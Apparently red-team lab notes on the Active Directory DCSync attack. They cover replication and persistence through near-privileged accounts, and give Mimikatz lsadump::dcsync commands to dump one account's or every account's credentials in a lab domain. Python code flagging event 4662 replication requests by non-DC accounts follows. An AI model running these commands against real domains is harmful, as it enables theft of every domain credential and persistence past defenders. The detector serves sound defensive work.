Credentials

Required Privileges: Administrators - Replicating Directory Changes

Domains are often spread across multiple regional locations, and having a single Domain Controller would significantly delay authentication services in AD. As such, these organizations make use of multiple DCs, so it is possible to authenticate with the same credentials in two different locations (this process is called Domain Replication).

Each Domain Controller runs a process called the Knowledge Consistency Checker (KCC). The KCC generates a replication topology for the AD Forest and automatically connects to other Domain Controllers through Remote Procedure Calls (RPC) to synchronize information. This includes updated information such as a user's new password, and new objects such as a newly created user.

A popular attack to perform is a DC Sync attack. If we have access to an account that has Domain Replication permissions, we can stage a DC Sync attack to harvest credentials from a DC.


Not All Credentials Are Created Equal

Privileged Credentials

If we only have Privileged Credentials, it is safe to say that as soon as the Blue Team discovers us, they will rotate those accounts, and we can potentially lose our access.

  • The goal then is to persist with Near-Privileged Credentials:
    • Credentials that have Local Administrator rights on several machines: Usually, organizations have groups with Local Admin rights on almost all computers. These groups are typically divided into one for Workstations and one for Servers.
    • Service Accounts that have Delegation Permissions: With these accounts, we would be able to forge Golden and Silver Tickets to perform Kerberos Delegation attacks.
    • Accounts used for Privileged AD Services: If we compromise accounts of privileged services such as Exchange, Windows Server Update Services (WSUS), or System Center Configuration Manager (SCCM), we could leverage AD exploitation to once again gain a privileged foothold.

DCSync

We can use Mimikatz to harvest these credentials. [Domain Administrator Credentials are Required]

:: Performing a DC Sync of a Single Account [Our own, for Example]
lsadump::dcsync /domain:za.adobe.loc /user:<Low-Privilege AD Username>

:: Performing a DC Sync of Every Account
:: Logging must be Enabled for this Task
log <Username>_dcdump.txt

:: Instead of Specifying the Username, the Flag [/all] is Used
:: This Output will go into a File in your Current Directory
lsadump::dcsync /domain:za.adobe.loc /all
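From the Blue Team side, a DC Sync shows up as a replication request (the same RPC the KCC uses) made by an account that is not a Domain Controller. The following is an added example, not part of the original notes or of Mimikatz: it scans constructed Security event 4662 records for the two replication control-access rights and flags any requester that is neither a known DC computer account nor an allowlisted sync account. The account names and the allowlist are hypothetical; the domain DN reuses the one from the commands above.

```python
import re

# Well-known control-access-right GUIDs that a directory replication request
# (DRSUAPI GetNCChanges, which DCSync uses) exercises on the domain head object.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Constructed sample of event ID 4662 records (one per line, key=value pairs).
# 4662 is only written when "Audit Directory Service Access" is enabled and the
# domain head carries a SACL for control access; account names are hypothetical.
SAMPLE_EVENTS = """\
SubjectUserName=ZADC01$ SubjectDomainName=ZA ObjectName=DC=za,DC=adobe,DC=loc AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
SubjectUserName=j.doe SubjectDomainName=ZA ObjectName=DC=za,DC=adobe,DC=loc AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
SubjectUserName=svc-aadconnect SubjectDomainName=ZA ObjectName=DC=za,DC=adobe,DC=loc AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
SubjectUserName=j.doe SubjectDomainName=ZA ObjectName=CN=Users,DC=za,DC=adobe,DC=loc AccessMask=0x10 Properties={bf967aba-0de6-11d0-a285-00aa003049e2}
"""


def parse_4662(line):
    """Split one key=value record and extract the GUIDs listed in Properties."""
    fields = dict(re.findall(r"(\w+)=(\S+)", line))
    guids = re.findall(r"[0-9a-fA-F-]{36}", fields.get("Properties", ""))
    fields["guids"] = {g.lower() for g in guids}
    return fields


def is_dcsync_candidate(event, dc_accounts, allowlist=frozenset()):
    """True when a replication right was exercised by a non-DC, non-allowlisted account."""
    if not event["guids"] & REPLICATION_GUIDS:
        return False
    user = event.get("SubjectUserName", "")
    return user not in dc_accounts and user not in allowlist


def find_dcsync(events_text, dc_accounts, allowlist=frozenset()):
    """Return (account, [replication GUIDs]) for every suspicious record."""
    hits = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        event = parse_4662(line)
        if is_dcsync_candidate(event, dc_accounts, allowlist):
            hits.append((event["SubjectUserName"], sorted(event["guids"] & REPLICATION_GUIDS)))
    return hits


if __name__ == "__main__":
    # Hypothetical DC computer account and an allowlisted directory-sync service account.
    for account, rights in find_dcsync(SAMPLE_EVENTS, {"ZADC01$"}, {"svc-aadconnect"}):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Real deployments should key the DC set off the Domain Controllers OU rather than a hard-coded list, and treat every non-DC replication request as an incident until the requester is explained.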